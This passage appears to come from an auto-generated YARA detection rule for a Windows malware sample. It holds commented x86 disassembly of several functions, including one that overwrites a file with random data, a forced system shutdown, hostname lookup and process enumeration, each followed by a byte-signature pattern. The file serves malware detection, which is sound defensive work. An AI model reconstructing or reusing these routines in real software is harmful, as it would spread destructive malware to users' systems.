.text:0x00402bb8 8b15b4a84000 mov edx,dword [0x0040a8b4] + .text:0x00402bbe 52 push edx + .text:0x00402bbf e80c120000 call 0x00403dd0 ;sub_00403dd0(<0x00402b73>) + .text:0x00402bc4 83c404 add esp,4 + .text:0x00402bc7 a3b0a84000 mov dword [0x0040a8b0],eax + .text:0x00402bcc 85c0 test eax,eax + .text:0x00402bce 7507 jnz 0x00402bd7 + .text:0x00402bd0 5e pop esi + .text:0x00402bd1 5d pop ebp + .text:0x00402bd2 5b pop ebx + .text:0x00402bd3 83c458 add esp,88 + .text:0x00402bd6 c3 ret + .text:0x00402bd7 loc_00402bd7: [1 XREFS] + .text:0x00402bd7 c705bca940000100 mov dword [0x0040a9bc],1 + .text:0x00402be1 loc_00402be1: [1 XREFS] + .text:0x00402be1 6a00 push 0 + .text:0x00402be3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402be5 8b442470 mov eax,dword [esp + 112] + .text:0x00402be9 8b0db0a84000 mov ecx,dword [0x0040a8b0] + .text:0x00402bef 50 push eax + .text:0x00402bf0 51 push ecx + .text:0x00402bf1 e84a160000 call 0x00404240 ;sub_00404240(0,arg2) + .text:0x00402bf6 83c408 add esp,8 + .text:0x00402bf9 85c0 test eax,eax + .text:0x00402bfb 7431 jz 0x00402c2e + .text:0x00402bfd 8b542474 mov edx,dword [esp + 116] + .text:0x00402c01 8b4c240c mov ecx,dword [esp + 12] + .text:0x00402c05 52 push edx + .text:0x00402c06 8b542414 mov edx,dword [esp + 20] + .text:0x00402c0a 51 push ecx + .text:0x00402c0b 8b4c241c mov ecx,dword [esp + 28] + .text:0x00402c0f 52 push edx + .text:0x00402c10 8b1528a04000 mov edx,dword [0x0040a028] + .text:0x00402c16 51 push ecx + .text:0x00402c17 8b4c2478 mov ecx,dword [esp + 120] + .text:0x00402c1b 6834ac4000 push 0x0040ac34 + .text:0x00402c20 52 push edx + .text:0x00402c21 68c8a94000 push 0x0040a9c8 + .text:0x00402c26 51 push ecx + .text:0x00402c27 ffd0 call eax ;UnknownApi() + .text:0x00402c29 83c420 add esp,32 + .text:0x00402c2c 8be8 mov ebp,eax + .text:0x00402c2e loc_00402c2e: [1 XREFS] + .text:0x00402c2e 8bc5 mov eax,ebp + .text:0x00402c30 5e pop esi + .text:0x00402c31 5d pop ebp + .text:0x00402c32 5b pop ebx + .text:0x00402c33 83c458 add esp,88 + .text:0x00402c36 c3 ret + */ + $c35 = { 83 EC 58 8B 15 ?? ?? ?? ?? B0 31 88 44 24 ?? 88 44 24 ?? A0 ?? ?? ?? ?? B1 56 88 44 24 ?? 8B 04 95 ?? ?? ?? ?? 53 89 44 24 ?? A1 ?? ?? ?? ?? 55 88 4C 24 ?? 88 4C 24 ?? 8A 0D ?? ?? ?? ?? 33 ED B3 53 56 8B 35 ?? ?? ?? ?? C6 44 24 ?? 49 85 C0 C6 44 24 ?? 44 C6 44 24 ?? 3A C6 44 24 ?? 32 C6 44 24 ?? 30 C6 44 24 ?? 33 C6 44 24 ?? 2D 88 5C 24 ?? C6 44 24 ?? 00 88 4C 24 ?? 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 04 55 FF D6 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? 57 B9 0C 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 8D 54 24 ?? F3 AB 52 68 B8 A8 40 00 AA 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? C6 44 24 ?? 00 E8 ?? ?? ?? ?? 83 C4 08 85 C0 5F 74 ?? 8B 0D ?? ?? ?? ?? 83 C0 06 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 8D 54 24 ?? 51 8B 0D ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 01 68 B8 A8 40 00 E8 ?? ?? ?? ?? 83 C4 08 33 C0 5E 5D 5B 83 C4 58 C3 6A 00 FF D6 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 83 F8 FF A3 ?? ?? ?? ?? 75 ?? 5E 5D 33 C0 5B 83 C4 58 C3 6A 00 FF D6 A1 ?? ?? ?? ?? 6A 00 50 FF 15 ?? ?? ?? ?? 6A 04 68 00 30 00 00 50 6A 00 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A 00 A3 ?? ?? ?? ?? FF D6 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A 00 68 A8 A8 40 00 51 52 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 85 C0 75 ?? 5E 5D 5B 83 C4 58 C3 C7 05 ?? ?? ?? ?? 01 00 00 00 6A 00 FF D6 8B 44 24 ?? 8B 0D ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? 8B 54 24 ?? 8B 4C 24 ?? 52 8B 54 24 ?? 51 8B 4C 24 ?? 52 8B 15 ?? ?? ?? ?? 51 8B 4C 24 ?? 68 34 AC 40 00 52 68 C8 A9 40 00 51 FF D0 83 C4 20 8B E8 8B C5 5E 5D 5B 83 C4 58 C3 } + /* +function at 0x00405800@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - get file size + - write file on Windows + .text:0x00405800 + .text:0x00405800 FUNC: int cdecl sub_00405800( int arg0, ) [2 XREFS] + .text:0x00405800 + .text:0x00405800 Stack Variables: (offset from initial top of stack) + .text:0x00405800 4: int arg0 + .text:0x00405800 -1023: int local1023 + .text:0x00405800 -1024: int local1024 + .text:0x00405800 -1028: int local1028 + .text:0x00405800 -1032: int local1032 + .text:0x00405800 + .text:0x00405800 66a162a54000 mov ax,word [0x0040a562] + .text:0x00405806 81ec08040000 sub esp,1032 + .text:0x0040580c 6685c0 test ax,ax + .text:0x0040580f 53 push ebx + .text:0x00405810 55 push ebp + .text:0x00405811 56 push esi + .text:0x00405812 0f84fa000000 jz 0x00405912 + .text:0x00405818 8b3578904000 mov esi,dword [0x00409078] + .text:0x0040581e 33ed xor ebp,ebp + .text:0x00405820 668be8 mov bp,ax + .text:0x00405823 6a00 push 0 + .text:0x00405825 c1e50a shl ebp,10 + .text:0x00405828 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040582a 8b842418040000 mov eax,dword [esp + 1048] + .text:0x00405831 6a00 push 0 + .text:0x00405833 6880000000 push 128 + .text:0x00405838 6a04 push 4 + .text:0x0040583a 6a00 push 0 + .text:0x0040583c 6a02 push 2 + .text:0x0040583e 6800000040 push 0x40000000 + .text:0x00405843 50 push eax + .text:0x00405844 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(arg0,0x40000000,2,0,4,128,0) + .text:0x0040584a 8bd8 mov ebx,eax + .text:0x0040584c 83fbff cmp ebx,0xffffffff + .text:0x0040584f 895c2410 mov dword [esp + 16],ebx + .text:0x00405853 0f84b9000000 jz 0x00405912 + .text:0x00405859 57 push edi + .text:0x0040585a 6a00 push 0 + .text:0x0040585c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040585e 6a02 push 2 + .text:0x00405860 6a00 push 0 + .text:0x00405862 6a00 push 0 + .text:0x00405864 53 push ebx + .text:0x00405865 ff15a8904000 call dword [0x004090a8] ;kernel32.SetFilePointer(kernel32.CreateFileA(arg0,0x40000000,2,0,4,128,0),0,0,2) + .text:0x0040586b 6a00 push 0 + .text:0x0040586d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040586f 6a00 push 0 + .text:0x00405871 53 push ebx + .text:0x00405872 ff15b0904000 call dword [0x004090b0] ;kernel32.GetFileSize(<0x00405844>,0) + .text:0x00405878 6a00 push 0 + .text:0x0040587a 8bf8 mov edi,eax + .text:0x0040587c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040587e 8bcd mov ecx,ebp + .text:0x00405880 c1e10a shl ecx,10 + .text:0x00405883 3bcf cmp ecx,edi + .text:0x00405885 767b jbe 0x00405902 + .text:0x00405887 b9ff000000 mov ecx,255 + .text:0x0040588c 33c0 xor eax,eax + .text:0x0040588e 8d7c2419 lea edi,dword [esp + 25] + .text:0x00405892 c644241800 mov byte [esp + 24],0 + .text:0x00405897 f3ab rep: stosd + .text:0x00405899 66ab stosd + .text:0x0040589b aa stosb + .text:0x0040589c 33ff xor edi,edi + .text:0x0040589e c744241000000000 mov dword [esp + 16],0 + .text:0x004058a6 85ed test ebp,ebp + .text:0x004058a8 7658 jbe 0x00405902 + .text:0x004058aa loc_004058aa: [1 XREFS] + .text:0x004058aa f7c7ff030000 test edi,1023 + .text:0x004058b0 752b jnz 0x004058dd + .text:0x004058b2 33db xor ebx,ebx + .text:0x004058b4 loc_004058b4: [1 XREFS] + .text:0x004058b4 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004058ba e8d1efffff call 0x00404890 ;sub_00404890() + .text:0x004058bf 02c3 add al,bl + .text:0x004058c1 b9ff000000 mov ecx,255 + .text:0x004058c6 0fbec0 movsx eax,al + .text:0x004058c9 99 cdq + .text:0x004058ca f7f9 idiv ecx + .text:0x004058cc 43 inc ebx + .text:0x004058cd 81fb00040000 cmp ebx,1024 + .text:0x004058d3 88541c17 mov byte [esp + ebx + 23],dl + .text:0x004058d7 7cdb jl 0x004058b4 + .text:0x004058d9 8b5c2414 mov ebx,dword [esp + 20] + .text:0x004058dd loc_004058dd: [1 XREFS] + .text:0x004058dd 6a00 push 0 + .text:0x004058df ffd6 call esi ;kernel32.Sleep(0) + .text:0x004058e1 8d542410 lea edx,dword [esp + 16] + .text:0x004058e5 6a00 push 0 + .text:0x004058e7 52 push edx + .text:0x004058e8 8d442420 lea eax,dword [esp + 32] + .text:0x004058ec 6800040000 push 1024 + .text:0x004058f1 50 push eax + .text:0x004058f2 53 push ebx + .text:0x004058f3 ff15a4904000 call dword [0x004090a4] ;kernel32.WriteFile(<0x00405844>,local1024,1024,local1032,0) + .text:0x004058f9 6a00 push 0 + .text:0x004058fb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004058fd 47 inc edi + .text:0x004058fe 3bfd cmp edi,ebp + .text:0x00405900 72a8 jc 0x004058aa + .text:0x00405902 loc_00405902: [2 XREFS] + .text:0x00405902 6a00 push 0 + .text:0x00405904 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405906 53 push ebx + .text:0x00405907 ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00405844>) + .text:0x0040590d 6a00 push 0 + .text:0x0040590f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405911 5f pop edi + .text:0x00405912 loc_00405912: [2 XREFS] + .text:0x00405912 5e pop esi + .text:0x00405913 5d pop ebp + .text:0x00405914 5b pop ebx + .text:0x00405915 81c408040000 add esp,1032 + .text:0x0040591b c3 ret + */ + $c36 = { 66 A1 ?? ?? ?? ?? 81 EC 08 04 00 00 66 85 C0 53 55 56 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 33 ED 66 8B E8 6A 00 C1 E5 0A FF D6 8B 84 24 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB FF 89 5C 24 ?? 0F 84 ?? ?? ?? ?? 57 6A 00 FF D6 6A 02 6A 00 6A 00 53 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 53 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8B CD C1 E1 0A 3B CF 76 ?? B9 FF 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 66 AB AA 33 FF C7 44 24 ?? 00 00 00 00 85 ED 76 ?? F7 C7 FF 03 00 00 75 ?? 33 DB 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 02 C3 B9 FF 00 00 00 0F BE C0 99 F7 F9 43 81 FB 00 04 00 00 88 54 1C ?? 7C ?? 8B 5C 24 ?? 6A 00 FF D6 8D 54 24 ?? 6A 00 52 8D 44 24 ?? 68 00 04 00 00 50 53 FF 15 ?? ?? ?? ?? 6A 00 FF D6 47 3B FD 72 ?? 6A 00 FF D6 53 FF 15 ?? ?? ?? ?? 6A 00 FF D6 5F 5E 5D 5B 81 C4 08 04 00 00 C3 } + /* +function at 0x00402790@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - read file on Windows + .text:0x00402790 + .text:0x00402790 FUNC: int cdecl sub_00402790( int arg0, int arg1, ) [2 XREFS] + .text:0x00402790 + .text:0x00402790 Stack Variables: (offset from initial top of stack) + .text:0x00402790 8: int arg1 + .text:0x00402790 4: int arg0 + .text:0x00402790 -4: int local4 + .text:0x00402790 + .text:0x00402790 51 push ecx + .text:0x00402791 53 push ebx + .text:0x00402792 56 push esi + .text:0x00402793 8b3578904000 mov esi,dword [0x00409078] + .text:0x00402799 57 push edi + .text:0x0040279a 6a00 push 0 + .text:0x0040279c c744241000000000 mov dword [esp + 16],0 + .text:0x004027a4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004027a6 8b442414 mov eax,dword [esp + 20] + .text:0x004027aa 6a00 push 0 + .text:0x004027ac 6a00 push 0 + .text:0x004027ae 6a03 push 3 + .text:0x004027b0 6a00 push 0 + .text:0x004027b2 6a01 push 1 + .text:0x004027b4 6800000080 push 0x80000000 + .text:0x004027b9 50 push eax + .text:0x004027ba ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(arg0,0x80000000,1,0,3,0,0) + .text:0x004027c0 8bf8 mov edi,eax + .text:0x004027c2 83ffff cmp edi,0xffffffff + .text:0x004027c5 7507 jnz 0x004027ce + .text:0x004027c7 5f pop edi + .text:0x004027c8 5e pop esi + .text:0x004027c9 33c0 xor eax,eax + .text:0x004027cb 5b pop ebx + .text:0x004027cc 59 pop ecx + .text:0x004027cd c3 ret + .text:0x004027ce loc_004027ce: [1 XREFS] + .text:0x004027ce 6a00 push 0 + .text:0x004027d0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004027d2 6a02 push 2 + .text:0x004027d4 6a00 push 0 + .text:0x004027d6 6800fcffff push 0xfffffc00 + .text:0x004027db 57 push edi + .text:0x004027dc ff15a8904000 call dword [0x004090a8] ;kernel32.SetFilePointer(kernel32.CreateFileA(arg0,0x80000000,1,0,3,0,0),0xfffffc00,0,2) + .text:0x004027e2 6800040000 push 1024 + .text:0x004027e7 e810560000 call 0x00407dfc ;msvcrt.??2@YAPAXI@Z(1024) + .text:0x004027ec 83c404 add esp,4 + .text:0x004027ef 8bd8 mov ebx,eax + .text:0x004027f1 6a00 push 0 + .text:0x004027f3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004027f5 8d4c240c lea ecx,dword [esp + 12] + .text:0x004027f9 6a00 push 0 + .text:0x004027fb 51 push ecx + .text:0x004027fc 6800040000 push 1024 + .text:0x00402801 53 push ebx + .text:0x00402802 57 push edi + .text:0x00402803 ff15b4904000 call dword [0x004090b4] ;kernel32.ReadFile(<0x004027ba>,msvcrt.??2@YAPAXI@Z(1024),1024,local4,0) + .text:0x00402809 6a00 push 0 + .text:0x0040280b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040280d 57 push edi + .text:0x0040280e ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x004027ba>) + .text:0x00402814 6a00 push 0 + .text:0x00402816 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402818 8b542418 mov edx,dword [esp + 24] + .text:0x0040281c 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402822 6a00 push 0 + .text:0x00402824 6800040000 push 1024 + .text:0x00402829 52 push edx + .text:0x0040282a 53 push ebx + .text:0x0040282b e8701f0000 call 0x004047a0 ;sub_004047a0(<0x004027e7>,arg1,1024,0) + .text:0x00402830 83f8ff cmp eax,0xffffffff + .text:0x00402833 7510 jnz 0x00402845 + .text:0x00402835 53 push ebx + .text:0x00402836 e8a5550000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x004027e7>) + .text:0x0040283b 83c404 add esp,4 + .text:0x0040283e 33c0 xor eax,eax + .text:0x00402840 5f pop edi + .text:0x00402841 5e pop esi + .text:0x00402842 5b pop ebx + .text:0x00402843 59 pop ecx + .text:0x00402844 c3 ret + .text:0x00402845 loc_00402845: [1 XREFS] + .text:0x00402845 5f pop edi + .text:0x00402846 03c3 add eax,ebx + .text:0x00402848 5e pop esi + .text:0x00402849 5b pop ebx + .text:0x0040284a 59 pop ecx + .text:0x0040284b c3 ret + */ + $c37 = { 51 53 56 8B 35 ?? ?? ?? ?? 57 6A 00 C7 44 24 ?? 00 00 00 00 FF D6 8B 44 24 ?? 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 80 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF FF 75 ?? 5F 5E 33 C0 5B 59 C3 6A 00 FF D6 6A 02 6A 00 68 00 FC FF FF 57 FF 15 ?? ?? ?? ?? 68 00 04 00 00 E8 ?? ?? ?? ?? 83 C4 04 8B D8 6A 00 FF D6 8D 4C 24 ?? 6A 00 51 68 00 04 00 00 53 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 6A 00 68 00 04 00 00 52 53 E8 ?? ?? ?? ?? 83 F8 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5F 5E 5B 59 C3 5F 03 C3 5E 5B 59 C3 } + /* +function at 0x00403ba0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - shutdown system + .text:0x00403ba0 + .text:0x00403ba0 FUNC: int thiscall_caller sub_00403ba0( void * ecx, int arg1, ) [2 XREFS] + .text:0x00403ba0 + .text:0x00403ba0 Stack Variables: (offset from initial top of stack) + .text:0x00403ba0 4: int arg1 + .text:0x00403ba0 + .text:0x00403ba0 56 push esi + .text:0x00403ba1 57 push edi + .text:0x00403ba2 8b3d78904000 mov edi,dword [0x00409078] + .text:0x00403ba8 8bf1 mov esi,ecx + .text:0x00403baa 6a00 push 0 + .text:0x00403bac ffd7 call edi ;kernel32.Sleep(0) + .text:0x00403bae 6a01 push 1 + .text:0x00403bb0 683ca04000 push 0x0040a03c + .text:0x00403bb5 8bce mov ecx,esi + .text:0x00403bb7 e824000000 call 0x00403be0 ;sub_00403be0(0x0040a03c,1) + .text:0x00403bbc 8b44240c mov eax,dword [esp + 12] + .text:0x00403bc0 6a00 push 0 + .text:0x00403bc2 50 push eax + .text:0x00403bc3 ff15d4914000 call dword [0x004091d4] ;user32.ExitWindowsEx(arg1,0) + .text:0x00403bc9 6a00 push 0 + .text:0x00403bcb ffd7 call edi ;kernel32.Sleep(0) + .text:0x00403bcd 6a00 push 0 + .text:0x00403bcf 683ca04000 push 0x0040a03c + .text:0x00403bd4 8bce mov ecx,esi + .text:0x00403bd6 e805000000 call 0x00403be0 ;sub_00403be0(0x0040a03c,0) + .text:0x00403bdb 5f pop edi + .text:0x00403bdc 5e pop esi + .text:0x00403bdd c20400 ret 4 + */ + $c38 = { 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A 00 FF D7 6A 01 68 3C A0 40 00 8B CE E8 ?? ?? ?? ?? 8B 44 24 ?? 6A 00 50 FF 15 ?? ?? ?? ?? 6A 00 FF D7 6A 00 68 3C A0 40 00 8B CE E8 ?? ?? ?? ?? 5F 5E C2 04 00 } + /* +function at 0x004050f0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get hostname + .text:0x004050f0 + .text:0x004050f0 FUNC: int cdecl sub_004050f0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x004050f0 + .text:0x004050f0 Stack Variables: (offset from initial top of stack) + .text:0x004050f0 12: int arg2 + .text:0x004050f0 8: int arg1 + .text:0x004050f0 4: int arg0 + .text:0x004050f0 -4: int local4 + .text:0x004050f0 -5: int local5 + .text:0x004050f0 -6: int local6 + .text:0x004050f0 -7: int local7 + .text:0x004050f0 -8: int local8 + .text:0x004050f0 + .text:0x004050f0 83ec08 sub esp,8 + .text:0x004050f3 53 push ebx + .text:0x004050f4 55 push ebp + .text:0x004050f5 56 push esi + .text:0x004050f6 8b3578904000 mov esi,dword [0x00409078] + .text:0x004050fc 57 push edi + .text:0x004050fd 6a00 push 0 + .text:0x004050ff ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405101 8b5c2424 mov ebx,dword [esp + 36] + .text:0x00405105 8b7c2420 mov edi,dword [esp + 32] + .text:0x00405109 8b4c241c mov ecx,dword [esp + 28] + .text:0x0040510d 53 push ebx + .text:0x0040510e 8d442414 lea eax,dword [esp + 20] + .text:0x00405112 57 push edi + .text:0x00405113 50 push eax + .text:0x00405114 51 push ecx + .text:0x00405115 c644242048 mov byte [esp + 32],72 + .text:0x0040511a c64424216f mov byte [esp + 33],111 + .text:0x0040511f c644242273 mov byte [esp + 34],115 + .text:0x00405124 c644242374 mov byte [esp + 35],116 + .text:0x00405129 c644242400 mov byte [esp + 36],0 + .text:0x0040512e e82dfeffff call 0x00404f60 ;sub_00404f60(arg0,local8,arg1,arg2) + .text:0x00405133 83c410 add esp,16 + .text:0x00405136 6a00 push 0 + .text:0x00405138 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040513a 8b2dc4904000 mov ebp,dword [0x004090c4] + .text:0x00405140 57 push edi + .text:0x00405141 ffd5 call ebp ;kernel32.lstrlenA(arg1) + .text:0x00405143 85c0 test eax,eax + .text:0x00405145 750f jnz 0x00405156 + .text:0x00405147 50 push eax + .text:0x00405148 ffd6 call esi ;kernel32.Sleep(kernel32.lstrlenA(arg1)) + .text:0x0040514a 53 push ebx + .text:0x0040514b 57 push edi + .text:0x0040514c ff1518924000 call dword [0x00409218] ;ws2_32.gethostname(arg1,arg2) + .text:0x00405152 6a00 push 0 + .text:0x00405154 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405156 loc_00405156: [1 XREFS] + .text:0x00405156 6a00 push 0 + .text:0x00405158 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040515a 57 push edi + .text:0x0040515b ffd5 call ebp ;kernel32.lstrlenA(arg1) + .text:0x0040515d 5f pop edi + .text:0x0040515e 5e pop esi + .text:0x0040515f 5d pop ebp + .text:0x00405160 5b pop ebx + .text:0x00405161 83c408 add esp,8 + .text:0x00405164 c3 ret + */ + $c39 = { 83 EC 08 53 55 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 8B 5C 24 ?? 8B 7C 24 ?? 8B 4C 24 ?? 53 8D 44 24 ?? 57 50 51 C6 44 24 ?? 48 C6 44 24 ?? 6F C6 44 24 ?? 73 C6 44 24 ?? 74 C6 44 24 ?? 00 E8 ?? ?? ?? ?? 83 C4 10 6A 00 FF D6 8B 2D ?? ?? ?? ?? 57 FF D5 85 C0 75 ?? 50 FF D6 53 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 57 FF D5 5F 5E 5D 5B 83 C4 08 C3 } + /* +function at 0x00407970@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - enumerate processes + .text:0x00407970 + .text:0x00407970 FUNC: int cdecl sub_00407970( int arg0, ) [4 XREFS] + .text:0x00407970 + .text:0x00407970 Stack Variables: (offset from initial top of stack) + .text:0x00407970 4: int arg0 + .text:0x00407970 + .text:0x00407970 55 push ebp + .text:0x00407971 8bec mov ebp,esp + .text:0x00407973 53 push ebx + .text:0x00407974 56 push esi + .text:0x00407975 8b3578904000 mov esi,dword [0x00409078] + .text:0x0040797b 57 push edi + .text:0x0040797c 6a00 push 0 + .text:0x0040797e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407980 90 nop + .text:0x00407981 6a00 push 0 + .text:0x00407983 6a02 push 2 + .text:0x00407985 e854080000 call 0x004081de ;kernel32.CreateToolhelp32Snapshot(2,0) + .text:0x0040798a 6a00 push 0 + .text:0x0040798c 8bd8 mov ebx,eax + .text:0x0040798e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407990 90 nop + .text:0x00407991 6828010000 push 296 + .text:0x00407996 e861040000 call 0x00407dfc ;msvcrt.??2@YAPAXI@Z(296) + .text:0x0040799b 83c404 add esp,4 + .text:0x0040799e 8bf8 mov edi,eax + .text:0x004079a0 6a00 push 0 + .text:0x004079a2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079a4 90 nop + .text:0x004079a5 6a00 push 0 + .text:0x004079a7 c70728010000 mov dword [edi],296 + .text:0x004079ad ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079af 90 nop + .text:0x004079b0 6a00 push 0 + .text:0x004079b2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079b4 57 push edi + .text:0x004079b5 53 push ebx + .text:0x004079b6 e81d080000 call 0x004081d8 ;kernel32.Process32First(kernel32.CreateToolhelp32Snapshot(2,0),msvcrt.??2@YAPAXI@Z(296)) + .text:0x004079bb 85c0 test eax,eax + .text:0x004079bd 7476 jz 0x00407a35 + .text:0x004079bf 6a00 push 0 + .text:0x004079c1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079c3 90 nop + .text:0x004079c4 90 nop + .text:0x004079c5 6a00 push 0 + .text:0x004079c7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079c9 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004079cc 8d4724 lea eax,dword [edi + 36] + .text:0x004079cf 51 push ecx + .text:0x004079d0 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004079d6 50 push eax + .text:0x004079d7 e824caffff call 0x00404400 ;sub_00404400(<0x00407996>,arg0) + .text:0x004079dc 85c0 test eax,eax + .text:0x004079de 6a00 push 0 + .text:0x004079e0 751e jnz 0x00407a00 + .text:0x004079e2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079e4 6a00 push 0 + .text:0x004079e6 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079e8 8b5f08 mov ebx,dword [edi + 8] + .text:0x004079eb 90 nop + .text:0x004079ec 57 push edi + .text:0x004079ed e8ee030000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00407996>) + .text:0x004079f2 83c404 add esp,4 + .text:0x004079f5 6a00 push 0 + .text:0x004079f7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079f9 5f pop edi + .text:0x004079fa 8bc3 mov eax,ebx + .text:0x004079fc 5e pop esi + .text:0x004079fd 5b pop ebx + .text:0x004079fe 5d pop ebp + .text:0x004079ff c3 ret + .text:0x00407a00 loc_00407a00: [1 XREFS] + .text:0x00407a00 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a02 90 nop + .text:0x00407a03 57 push edi + .text:0x00407a04 53 push ebx + .text:0x00407a05 e8c8070000 call 0x004081d2 ;kernel32.Process32Next(<0x00407985>,<0x00407996>) + .text:0x00407a0a 85c0 test eax,eax + .text:0x00407a0c 7427 jz 0x00407a35 + .text:0x00407a0e loc_00407a0e: [1 XREFS] + .text:0x00407a0e 6a00 push 0 + .text:0x00407a10 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a12 90 nop + .text:0x00407a13 8b5508 mov edx,dword [ebp + 8] + .text:0x00407a16 8d4724 lea eax,dword [edi + 36] + .text:0x00407a19 52 push edx + .text:0x00407a1a 50 push eax + .text:0x00407a1b ff1560904000 call dword [0x00409060] ;kernel32.lstrcmpiA(<0x00407996>,arg0) + .text:0x00407a21 85c0 test eax,eax + .text:0x00407a23 7431 jz 0x00407a56 + .text:0x00407a25 90 nop + .text:0x00407a26 6a00 push 0 + .text:0x00407a28 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a2a 57 push edi + .text:0x00407a2b 53 push ebx + .text:0x00407a2c e8a1070000 call 0x004081d2 ;kernel32.Process32Next(<0x00407985>,<0x00407996>) + .text:0x00407a31 85c0 test eax,eax + .text:0x00407a33 75d9 jnz 0x00407a0e + .text:0x00407a35 loc_00407a35: [2 XREFS] + .text:0x00407a35 6a00 push 0 + .text:0x00407a37 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a39 90 nop + .text:0x00407a3a 53 push ebx + .text:0x00407a3b ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00407985>) + .text:0x00407a41 90 nop + .text:0x00407a42 57 push edi + .text:0x00407a43 e898030000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00407996>) + .text:0x00407a48 83c404 add esp,4 + .text:0x00407a4b 6a00 push 0 + .text:0x00407a4d ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a4f 5f pop edi + .text:0x00407a50 5e pop esi + .text:0x00407a51 33c0 xor eax,eax + .text:0x00407a53 5b pop ebx + .text:0x00407a54 5d pop ebp + .text:0x00407a55 c3 ret + .text:0x00407a56 loc_00407a56: [1 XREFS] + .text:0x00407a56 90 nop + .text:0x00407a57 6a00 push 0 + .text:0x00407a59 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a5b 8b5f08 mov ebx,dword [edi + 8] + .text:0x00407a5e 57 push edi + .text:0x00407a5f e87c030000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00407996>) + .text:0x00407a64 83c404 add esp,4 + .text:0x00407a67 6a00 push 0 + .text:0x00407a69 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a6b 90 nop + .text:0x00407a6c 5f pop 